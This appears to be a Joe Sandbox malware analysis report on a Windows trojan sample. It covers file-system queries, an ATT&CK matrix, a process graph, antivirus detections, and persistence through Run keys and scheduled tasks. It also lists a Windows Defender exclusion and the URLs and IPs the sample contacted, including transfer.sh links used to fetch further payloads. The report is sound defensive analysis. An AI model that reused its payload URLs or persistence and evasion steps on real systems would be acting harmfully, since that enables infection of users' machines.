Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		11
Process Injection		1
Masquerading		OS Credential Dumping131
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
PowerShell		1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
Registry Run Keys / Startup Folder		41
Virtualization/Sandbox Evasion		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS11
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Obfuscated Files or Information		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 865491 Sample: SecuriteInfo.com.Win64.Troj... Startdate: 14/05/2023 Architecture: WINDOWS Score: 80 75 Multi AV Scanner detection for submitted file 2->75 9 SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe 43 2->9         started        14 MonDisc.exe 15 2->14         started        16 MonDisc.exe 2->16         started        18 MonDisc.exe 2->18         started        process3 dnsIp4 65 ip-api.com 208.95.112.1, 49692, 49704, 49710 TUT-ASUS United States 9->65 67 185.159.129.168, 49700, 49706, 49712 ITOS-ASRU Russian Federation 9->67 71 3 other IPs or domains 9->71 59 C:\Users\user\AppData\Roaming\...\LoWin64.exe, PE32+ 9->59 dropped 61 C:\Users\user\AppData\Roaming\MonDisc.exe, PE32+ 9->61 dropped 87 Suspicious powershell command line found 9->87 89 May check the online IP address of the machine 9->89 91 Adds a directory exclusion to Windows Defender 9->91 20 MonDisc.exe 2 15 9->20         started        24 LoWin64.exe 9->24         started        26 powershell.exe 12 9->26         started        69 185.149.146.118, 49713, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 14->69 28 powershell.exe 14->28         started        30 schtasks.exe 14->30         started        file5 signatures6 process7 dnsIp8 63 ip-api.com 20->63 77 Antivirus detection for dropped file 20->77 79 Multi AV Scanner detection for dropped file 20->79 81 Suspicious powershell command line found 20->81 85 2 other signatures 20->85 32 powershell.exe 10 20->32         started        35 schtasks.exe 1 20->35         started        83 Adds a directory exclusion to Windows Defender 26->83 37 powershell.exe 18 26->37         started        39 conhost.exe 26->39         started        41 powershell.exe 28->41         started        43 conhost.exe 28->43         started        45 conhost.exe 30->45         started        signatures9 process10 signatures11 73 Adds a directory exclusion to Windows Defender 32->73 47 powershell.exe 11 32->47         started        49 conhost.exe 32->49         started        51 conhost.exe 35->51         started        53 conhost.exe 37->53         started        55 conhost.exe 41->55         started        process12 process13 57 conhost.exe 47->57         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe24%ReversingLabsWin64.Trojan.Amadey
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe26%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\MonDisc.exe100%AviraHEUR/AGEN.1315574
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe100%AviraHEUR/AGEN.1315574
C:\Users\user\AppData\Roaming\MonDisc.exe54%ReversingLabsWin64.Trojan.Lazy
C:\Users\user\AppData\Roaming\MonDisc.exe56%VirustotalBrowse
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe49%ReversingLabsWin64.Trojan.Lazy
C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe54%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.m0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://crl.micr0qv0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ip-api.com
208.95.112.1
truefalse
    		high
    transfer.sh
    		144.76.136.153
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://transfer.sh/get/1PRjTr/clip.exefalse
        		high
        https://transfer.sh/get/1h9hjM/LoWin64.exefalse
          		high
          http://ip-api.com/json/?fields=query,status,countryCode,city,timezonefalse
            		high
            https://transfer.sh/get/1PRjTr/clip.exefalse
              		high
              http://transfer.sh/get/1h9hjM/LoWin64.exefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.mpowershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808028D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://oneget.orgXpowershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.micr0qvpowershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.335874008.0000028080001000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://oneget.orgpowershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUSfalse
                            144.76.136.153
                            		transfer.shGermany
                            		24940HETZNER-ASDEfalse
                            185.159.130.81
                            		unknownRussian Federation
                            		64439ITOS-ASRUfalse
                            185.149.146.118
                            		unknownRussian Federation
                            		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                            185.159.129.168
                            		unknownRussian Federation
                            		64439ITOS-ASRUfalse

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:865491
                            Start date and time:2023-05-14 04:48:30 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 38s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:40
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Detection:MAL
                            Classification:mal80.troj.evad.winEXE@31/21@4/6
                            EGA Information:
                            • Successful, ratio: 40%
                            HDC Information:
                            • Successful, ratio: 60.5% (good quality ratio 52.1%)
                            • Quality average: 62%
                            • Quality standard deviation: 34.3%
                            HCA Information:
                            • Successful, ratio: 71%
                            • Number of executed functions: 93
                            • Number of non-executed functions: 43
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.36.225.122
                            • Excluded domains from analysis (whitelisted): www.bing.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                            • Execution Graph export aborted for target powershell.exe, PID 1840 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 2820 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 5032 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            04:51:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MonDisc "C:\Users\user\AppData\Roaming\MonDisc.exe"
                            04:51:05Task SchedulerRun new task: MonDisc path: C:\Users\user\AppData\Roaming\MonDisc.exe
                            04:51:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MonDisc "C:\Users\user\AppData\Roaming\MonDisc.exe"

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1HelloKittyCafe.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            SrfFpGhGIc.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • ip-api.com/json/
                            LOIC.exeGet hashmaliciousUnknownBrowse
                            • ip-api.com/line/?fields=hosting
                            PeterBot.exeGet hashmaliciousUnknownBrowse
                            • ip-api.com/line/?fields=hosting
                            persistenceModule.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            qsteemp.exeGet hashmaliciousGurcu StealerBrowse
                            • ip-api.com/line?fields=query,country
                            Qukp.exeGet hashmaliciousRedLineBrowse
                            • ip-api.com/line/?fields=hosting
                            Y9IlbIEYjk.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • ip-api.com/json/
                            RA2.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            sourcecode.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            Spotify.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            XBinderOutputBREAD.exeGet hashmaliciousUnknownBrowse
                            • ip-api.com/line/?fields=hosting
                            XClient.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            xw.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            4XFf8KBC6s.exeGet hashmaliciousNymaim, RedLine, SmokeLoader, onlyLoggerBrowse
                            • ip-api.com/json/
                            file.exeGet hashmaliciousBlackGuardBrowse
                            • ip-api.com/json/
                            PO_20091827994.jsGet hashmaliciousWSHRATBrowse
                            • ip-api.com/json/
                            JFBYfxYeTO.exeGet hashmaliciousBlackGuardBrowse
                            • ip-api.com/json/
                            JHtrZ0tgun.exeGet hashmaliciousBlackGuardBrowse
                            • ip-api.com/json/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ip-api.comHelloKittyCafe.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            SrfFpGhGIc.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • 208.95.112.1
                            LOIC.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            PeterBot.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            persistenceModule.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            qsteemp.exeGet hashmaliciousGurcu StealerBrowse
                            • 208.95.112.1
                            Qukp.exeGet hashmaliciousRedLineBrowse
                            • 208.95.112.1
                            Y9IlbIEYjk.exeGet hashmaliciousVjW0rm, WSHRATBrowse
                            • 208.95.112.1
                            RA2.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            sourcecode.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            Spotify.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            XBinderOutputBREAD.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            XClient.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            xw.exeGet hashmaliciousXWormBrowse
                            • 208.95.112.1
                            build4.exeGet hashmaliciousGurcu StealerBrowse
                            • 208.95.112.1
                            zCXfw71997.exeGet hashmaliciousUnknownBrowse
                            • 208.95.112.1
                            4XFf8KBC6s.exeGet hashmaliciousNymaim, RedLine, SmokeLoader, onlyLoggerBrowse
                            • 208.95.112.1
